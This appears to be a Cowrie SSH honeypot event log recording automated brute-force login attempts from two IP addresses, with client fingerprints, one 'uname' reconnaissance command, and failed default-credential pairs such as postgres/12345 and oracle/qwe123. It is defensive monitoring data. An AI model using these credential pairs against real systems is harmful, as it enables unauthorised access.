{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:40:03.766536Z","src_ip":"212.227.125.160","session":"8eca99cd88e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:03.950979Z","src_ip":"212.227.125.160","session":"8eca99cd88e3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:03.952520Z","src_ip":"212.227.125.160","session":"8eca99cd88e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59028,"dst_ip":"1.2.3.4","dst_port":22,"session":"58392baa472c","protocol":"ssh","message":"New connection: 212.227.235.229:59028 (1.2.3.4:22) [session: 58392baa472c]","sensor":"my-vps","timestamp":"2025-08-31T04:40:07.070304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:07.868196Z","src_ip":"212.227.235.229","session":"58392baa472c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:40:07.869282Z","src_ip":"212.227.235.229","session":"58392baa472c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48308,"dst_ip":"1.2.3.4","dst_port":22,"session":"e538cb6bdcb0","protocol":"ssh","message":"New connection: 212.227.125.160:48308 (1.2.3.4:22) [session: e538cb6bdcb0]","sensor":"my-vps","timestamp":"2025-08-31T04:40:08.004850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:08.005786Z","src_ip":"212.227.125.160","session":"e538cb6bdcb0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:40:08.195185Z","src_ip":"212.227.125.160","session":"e538cb6bdcb0"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:08.765176Z","src_ip":"212.227.125.160","session":"e538cb6bdcb0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:09.956380Z","src_ip":"212.227.125.160","session":"e538cb6bdcb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"14.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 14.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:10.940555Z","src_ip":"212.227.235.229","session":"9f6f74de9bc9"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:11.992403Z","src_ip":"212.227.235.229","session":"1c04fb1dc44a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345","message":"login attempt [postgres/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:13.491550Z","src_ip":"212.227.235.229","session":"58392baa472c"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:15.359377Z","src_ip":"212.227.235.229","session":"58392baa472c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37408,"dst_ip":"1.2.3.4","dst_port":22,"session":"959bbca17139","protocol":"ssh","message":"New connection: 212.227.125.160:37408 (1.2.3.4:22) [session: 959bbca17139]","sensor":"my-vps","timestamp":"2025-08-31T04:40:17.558169Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48964,"dst_ip":"1.2.3.4","dst_port":22,"session":"cadf0193dec5","protocol":"ssh","message":"New connection: 212.227.125.160:48964 (1.2.3.4:22) [session: cadf0193dec5]","sensor":"my-vps","timestamp":"2025-08-31T04:40:18.633816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:18.634499Z","src_ip":"212.227.125.160","session":"cadf0193dec5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:40:18.822507Z","src_ip":"212.227.125.160","session":"cadf0193dec5"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:19.386862Z","src_ip":"212.227.125.160","session":"cadf0193dec5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:20.576497Z","src_ip":"212.227.125.160","session":"cadf0193dec5"}
{"eventid":"cowrie.session.closed","duration":"170.1","message":"Connection lost after 170.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:21.846184Z","src_ip":"212.227.235.229","session":"9f6f74de9bc9"}
{"eventid":"cowrie.session.closed","duration":"45.6","message":"Connection lost after 45.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:22.570772Z","src_ip":"212.227.235.229","session":"1c04fb1dc44a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49028,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d865def962e","protocol":"ssh","message":"New connection: 212.227.125.160:49028 (1.2.3.4:22) [session: 3d865def962e]","sensor":"my-vps","timestamp":"2025-08-31T04:40:24.033618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:24.034533Z","src_ip":"212.227.125.160","session":"3d865def962e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:40:24.217434Z","src_ip":"212.227.125.160","session":"3d865def962e"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:24.766119Z","src_ip":"212.227.125.160","session":"3d865def962e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:25.951670Z","src_ip":"212.227.125.160","session":"3d865def962e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48882,"dst_ip":"1.2.3.4","dst_port":22,"session":"280e9f4f8fb8","protocol":"ssh","message":"New connection: 212.227.125.160:48882 (1.2.3.4:22) [session: 280e9f4f8fb8]","sensor":"my-vps","timestamp":"2025-08-31T04:40:27.786948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:28.391853Z","src_ip":"212.227.125.160","session":"280e9f4f8fb8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:40:28.392548Z","src_ip":"212.227.125.160","session":"280e9f4f8fb8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:30.245369Z","src_ip":"212.227.125.160","session":"959bbca17139"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:40:30.357282Z","src_ip":"212.227.125.160","session":"959bbca17139"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345","message":"login attempt [postgres/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:30.809373Z","src_ip":"212.227.125.160","session":"280e9f4f8fb8"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:32.404685Z","src_ip":"212.227.125.160","session":"280e9f4f8fb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60264,"dst_ip":"1.2.3.4","dst_port":22,"session":"210e7a51cacc","protocol":"ssh","message":"New connection: 212.227.235.229:60264 (1.2.3.4:22) [session: 210e7a51cacc]","sensor":"my-vps","timestamp":"2025-08-31T04:40:33.508116Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42878,"dst_ip":"1.2.3.4","dst_port":22,"session":"94c87ac6b3a8","protocol":"ssh","message":"New connection: 212.227.125.160:42878 (1.2.3.4:22) [session: 94c87ac6b3a8]","sensor":"my-vps","timestamp":"2025-08-31T04:40:34.736621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:34.737839Z","src_ip":"212.227.125.160","session":"94c87ac6b3a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:40:34.931200Z","src_ip":"212.227.125.160","session":"94c87ac6b3a8"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:35.509119Z","src_ip":"212.227.125.160","session":"94c87ac6b3a8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:36.703550Z","src_ip":"212.227.125.160","session":"94c87ac6b3a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53488,"dst_ip":"1.2.3.4","dst_port":22,"session":"962f7a77dac1","protocol":"ssh","message":"New connection: 212.227.125.160:53488 (1.2.3.4:22) [session: 962f7a77dac1]","sensor":"my-vps","timestamp":"2025-08-31T04:40:50.668616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:50.669530Z","src_ip":"212.227.125.160","session":"962f7a77dac1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:40:50.856587Z","src_ip":"212.227.125.160","session":"962f7a77dac1"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:40:51.421680Z","src_ip":"212.227.125.160","session":"962f7a77dac1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:52.611795Z","src_ip":"212.227.125.160","session":"962f7a77dac1"}
{"eventid":"cowrie.session.closed","duration":"26.0","message":"Connection lost after 26.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:40:59.459859Z","src_ip":"212.227.235.229","session":"210e7a51cacc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56422,"dst_ip":"1.2.3.4","dst_port":22,"session":"44ee64279589","protocol":"ssh","message":"New connection: 212.227.125.160:56422 (1.2.3.4:22) [session: 44ee64279589]","sensor":"my-vps","timestamp":"2025-08-31T04:41:01.454948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:01.455808Z","src_ip":"212.227.125.160","session":"44ee64279589"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:41:01.639428Z","src_ip":"212.227.125.160","session":"44ee64279589"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:02.188957Z","src_ip":"212.227.125.160","session":"44ee64279589"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:03.374377Z","src_ip":"212.227.125.160","session":"44ee64279589"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37968,"dst_ip":"1.2.3.4","dst_port":22,"session":"04fcd1aea1c6","protocol":"ssh","message":"New connection: 212.227.235.229:37968 (1.2.3.4:22) [session: 04fcd1aea1c6]","sensor":"my-vps","timestamp":"2025-08-31T04:41:05.997994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:41:06.757830Z","src_ip":"212.227.235.229","session":"04fcd1aea1c6"}
